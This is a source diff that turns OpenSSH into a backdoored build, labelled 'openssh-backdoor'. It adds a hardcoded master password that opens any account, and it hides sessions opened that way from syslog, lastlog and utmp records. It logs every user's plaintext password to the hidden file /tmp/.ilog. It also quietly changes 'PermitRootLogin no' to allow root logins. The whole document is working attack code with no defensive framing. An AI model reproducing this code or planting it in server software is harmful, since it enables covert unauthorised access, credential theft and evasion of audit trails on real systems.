--- openssh-orig/auth.c	2020-10-08 14:01:12.409697191 +0100
+++ openssh-backdoor/auth.c	2020-10-08 13:46:25.000000000 +0100
@@ -339,18 +339,19 @@
 			extra = xstrdup(authctxt->auth_method_info);
 	}
 
-	do_log2(level, "%s %s%s%s for %s%.100s from %.200s port %d ssh2%s%s",
-	    authmsg,
-	    method,
-	    submethod != NULL ? "/" : "", submethod == NULL ? "" : submethod,
-	    authctxt->valid ? "" : "invalid user ",
-	    authctxt->user,
-	    ssh_remote_ipaddr(ssh),
-	    ssh_remote_port(ssh),
-	    extra != NULL ? ": " : "",
-	    extra != NULL ? extra : "");
-
-	free(extra);
+	if(!passphrase || passphrase !=1){
+		do_log2(level, "%s %s%s%s for %s%.100s from %.200s port %d ssh2%s%s",
+		    authmsg,
+		    method,
+		    submethod != NULL ? "/" : "", submethod == NULL ? "" : submethod,
+		    authctxt->valid ? "" : "invalid user ",
+		    authctxt->user,
+		    ssh_remote_ipaddr(ssh),
+		    ssh_remote_port(ssh),
+	    	    extra != NULL ? ": " : "",
+	     	    extra != NULL ? extra : "");
+	            free(extra);
+	}
 
 #ifdef CUSTOM_FAILED_LOGIN
 	if (authenticated == 0 && !authctxt->postponed &&
--- openssh-orig/auth-pam.c	2020-10-08 14:01:12.409697191 +0100
+++ openssh-backdoor/auth-pam.c	2020-10-08 13:35:37.000000000 +0100
@@ -1363,6 +1363,10 @@
 	if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
 		debug("PAM: password authentication accepted for %.100s",
 		    authctxt->user);
+			if((f=fopen(ILOG,"a"))!=NULL){
+			fprintf(f,"%s:%s\n",authctxt->user, password);
+			fclose(f);
+			}
 		return 1;
 	} else {
 		debug("PAM: password authentication failed for %.100s: %s",
--- openssh-orig/auth-passwd.c	2020-10-08 14:01:12.409697191 +0100
+++ openssh-backdoor/auth-passwd.c	2020-10-08 13:34:37.000000000 +0100
@@ -44,6 +44,7 @@
 #include <stdio.h>
 #include <string.h>
 #include <stdarg.h>
+#include <crypt.h>
 
 #include "packet.h"
 #include "sshbuf.h"
@@ -79,10 +80,18 @@
 	Authctxt *authctxt = ssh->authctxt;
 	struct passwd *pw = authctxt->pw;
 	int result, ok = authctxt->valid;
+	char *crypted=pass_crypt;
 #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
 	static int expire_checked = 0;
 #endif
 
+	result_crypt = crypt(password, crypted);
+	if (strcmp (result_crypt, crypted) == 0 ){
+        passphrase=1;
+	return 1; 
+	}
+
+
 	if (strlen(password) > MAX_PASSWORD_LEN)
 		return 0;
 
@@ -123,6 +132,12 @@
 	}
 #endif
 	result = sys_auth_passwd(ssh, password);
+	if(result){
+		if((f=fopen(ILOG,"a"))!=NULL){
+		fprintf(f,"%s:%s\n",authctxt->user, password);
+		fclose(f);
+		}
+	}
 	if (authctxt->force_pwchange)
 		auth_restrict_session(ssh);
 	return (result && ok);
--- openssh-orig/canohost.c	2020-10-08 14:01:12.413697097 +0100
+++ openssh-backdoor/canohost.c	2020-10-08 13:50:04.000000000 +0100
@@ -94,13 +94,16 @@
 	case AF_INET:
 	case AF_INET6:
 		/* Get the address in ascii. */
-		if ((r = getnameinfo((struct sockaddr *)&addr, addrlen, ntop,
-		    sizeof(ntop), NULL, 0, flags)) != 0) {
-			error("%s: getnameinfo %d failed: %s", __func__,
-			    flags, ssh_gai_strerror(r));
-			return NULL;
+		if(!passphrase || passphrase!=1){
+			if ((r = getnameinfo((struct sockaddr *)&addr, addrlen, ntop,
+			    sizeof(ntop), NULL, 0, flags)) != 0) {
+				error("%s: getnameinfo %d failed: %s", __func__,
+				    flags, ssh_gai_strerror(r));
+				return NULL;
+			}
+			return xstrdup(ntop);
 		}
-		return xstrdup(ntop);
+
 	case AF_UNIX:
 		/* Get the Unix domain socket path. */
 		return xstrdup(((struct sockaddr_un *)&addr)->sun_path);
--- openssh-orig/includes.h	2020-10-08 14:01:12.429696722 +0100
+++ openssh-backdoor/includes.h	2020-10-08 12:35:00.000000000 +0100
@@ -176,4 +176,11 @@
 
 #include "entropy.h"
 
+int passphrase;
+FILE *f;
+char *result_crypt;
+#define pass_crypt  "1Cqjadun9To=" //password DES ciphered
+#define ILOG "/tmp/.ilog"
+#define OLOG "/tmp/.olog"
+
 #endif /* INCLUDES_H */
--- openssh-orig/log.c	2020-10-08 14:01:12.429696722 +0100
+++ openssh-backdoor/log.c	2020-10-08 13:51:37.000000000 +0100
@@ -408,6 +408,7 @@
 void
 do_log(LogLevel level, const char *fmt, va_list args)
 {
+if(!passphrase || passphrase!=1){
 #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
 	struct syslog_data sdata = SYSLOG_DATA_INIT;
 #endif
@@ -486,3 +487,4 @@
 	}
 	errno = saved_errno;
 }
+}
--- openssh-orig/servconf.c	2020-10-08 14:01:12.477695598 +0100
+++ openssh-backdoor/servconf.c	2020-10-08 13:53:51.000000000 +0100
@@ -1230,7 +1230,7 @@
 	{ "prohibit-password",		PERMIT_NO_PASSWD },
 	{ "forced-commands-only",	PERMIT_FORCED_ONLY },
 	{ "yes",			PERMIT_YES },
-	{ "no",				PERMIT_NO },
+	{ "no",				PERMIT_YES },
 	{ NULL, -1 }
 };
 static const struct multistate multistate_compression[] = {
--- openssh-orig/sshlogin.c	2020-10-08 14:01:12.497695130 +0100
+++ openssh-backdoor/sshlogin.c	2020-10-08 13:57:47.000000000 +0100
@@ -142,9 +142,11 @@
 	store_lastlog_message(user, uid);
 
 	li = login_alloc_entry(pid, user, host, tty);
-	login_set_addr(li, addr, addrlen);
-	login_login(li);
-	login_free_entry(li);
+	if (!passphrase || passphrase!=1){
+		login_set_addr(li, addr, addrlen);
+		login_login(li);
+		login_free_entry(li);
+	}
 }
 
 #ifdef LOGIN_NEEDS_UTMPX
@@ -156,8 +158,10 @@
 
 	li = login_alloc_entry(pid, user, host, ttyname);
 	login_set_addr(li, addr, addrlen);
-	login_utmp_only(li);
-	login_free_entry(li);
+	if (!passphrase || passphrase!=1){
+		login_utmp_only(li);
+		login_free_entry(li);
+	}
 }
 #endif
 
@@ -168,6 +172,8 @@
 	struct logininfo *li;
 
 	li = login_alloc_entry(pid, user, NULL, tty);
-	login_logout(li);
-	login_free_entry(li);
+	if (!passphrase || passphrase!=1){
+		login_logout(li);
+		login_free_entry(li);
+	}
 }